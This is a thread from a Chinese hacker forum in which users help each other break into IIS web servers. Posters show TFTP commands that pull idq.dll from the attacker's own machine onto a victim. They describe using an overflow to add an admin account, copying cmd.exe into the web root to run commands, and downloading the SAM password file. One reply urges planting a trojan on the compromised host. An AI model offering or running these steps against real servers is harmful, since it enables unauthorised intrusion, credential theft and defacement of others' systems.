20CN网络安全小组第一代论坛: IIS难题

»	20CN网络安全小组第一代论坛 » 安全基地 » 黑客基地 » IIS难题

作者

标题: IIS难题

quake
未注册

发表于

我用流光的IIS 远程执行: Remote Execute-E,dir是行的，但我上传idq.dll失败。我已经开了tftpd32.exe,设好了路径，也知道对方的主页路径。在IIS 远程执行: Remote Execute-E运行
tftp -i *.*.*.* idq.dll c://inetpub//scripts//idq.dll
文件没传上去。
还有，这个自己的ip是动态分配的ip，还是局域网的ip?（我们有2台机子上网，我是挂在另一台上的。）

IP: 已记录

quake
未注册

发表于

不好意思，打错字了！
我用流光的IIS 远程执行: Remote Execute-E,dir是行的，但我上传idq.dll失败。我已经开了tftpd32.exe,设好了路径，也知道对方的虚拟路径(为c:\inetpub\scripts)。在I IS 远程执行: Remote Execute-E运行
tftp -i *.*.*.* idq.dll c:\\inetpub\\scripts\\idq.dll
文件没传上去。
还有，这个自己的ip是动态分配的ip，还是局域网的ip?（我们有2台机子上网，我是挂在另一台上的。）

IP: 已记录

§溶
未注册

发表于

被上传文件应该放在TFTP的目录里,要不在IDQ.DLL前加上文件所在路径也行,你用的可能是共享上网,你可以在拨号的那台机器上运行WINI PCFG,把MODEM绑定,就可是看到真的IP了,上传的时候就用拨号时的IP

IP: 已记录

quake
未注册

发表于

我已经把idq.dll放在tftpd32目录下，在tftpd32.exe中也把路径设定为idq.dll所在的目录。
我用的是共享上网，而且我用qq的显示好友补丁已经显示我的ip,也就是主机的ip(她的qq号码是我的好友，所以显示的ip也就是我的ip，因为我们是共享的嘛！) 。
望您老再指点指点！虚心学习，万分感谢！

IP: 已记录

§溶
未注册

发表于

tftp -i *.*.*.* idq.dll c:\\inetpub\\scripts\\idq.dll
仔细找找还有什么地方错了？好象还缺什么参数吧

IP: 已记录

没影
未注册

发表于

tftp -i *.*.*.* get idq.dllc:\\inetpub\\scripts\\idq.dll

IP: 已记录

§溶
未注册

发表于

没影兄弟,你那篇求助帖子可能由于CGI故障,现在打开的是空白页面,看不到你的回复,望见晾!

IP: 已记录

没影
未注册

发表于

又碰到一个难题：

利用溢出进入肉鸡winnt\system32目录成功
建立超级用户成功
建立ipc$连接失败
利用tftp失败（提示tftp不是内部或外部命令）
复制cmd.exe to c;\inetpub\wwwroot成功
IE调用cmd.exe成功

现在除了下载sam和修改主页外还能上传文件吗？？？

IP: 已记录

§溶
未注册

发表于

你是不是通过溢出后舰艇一个端口得到ADMIN的?如果是那样的话就想办法看FTP能不能用,远程用FTP看能不能从你本机IP下载文件,FTP> ;GET YOUIP FILE.前提是本机开了F TP服务,如果这也不行,那么可能是真的有了防火墙,而且安全策略文件还是混合型的.如果能用FTP登陆到本地机并上传下载文件,别心软,找H IV给他放个木马